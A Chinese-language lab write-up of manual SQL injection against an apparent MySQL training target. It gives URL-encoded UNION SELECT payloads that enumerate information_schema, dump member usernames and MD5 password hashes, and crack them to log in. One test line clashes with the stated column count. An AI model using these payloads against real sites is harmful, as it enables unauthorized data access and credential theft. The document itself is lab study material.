sql注入靶机手工复现(mysql数据库)
MySQL数据库手工注入漏洞测试
靶场介绍
解体思路:
1、寻找注入点
2、判断是否存在注入
3、利用order by 判断字段数量
4、联合注入
复现
1、寻找注入点
访问,发现了其他页面
跳转页面后,发现可以注入点
2、判断注入
and 1=1 返回正常
and 1=2 返回错误
可以判断出,存在注入点
3、order by 判断字段数量
order by 4 正常回显
order by 5 ,发现到5报错,说明只有四个字段数
4、联合注入
使用联合查询来查询回显值位置
id=-1%20union%20select%201,2,3,4,5
返回值在2和3
根据返回值,构造拼接语句进行查询数据库名和版本
id=-1 union select 1,database(),version(),4
得到数据库名后,进行查询数据库,爆破表名
id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema%20=%20%22mozhe_Discuz_StormGroup%22#
根据表名,爆破段名
id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name%20=%20%22StormGroup_member%22%20#
根据段名,爆破内容
id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member%20#
查询出数据后,进行MD5破解 破解网站
https://www.cmd5.com/
解密后,可以得到两个账号 账号一:mozhe dsan13 账号二:mozhe 928501 登陆后,就可以得到key
- END -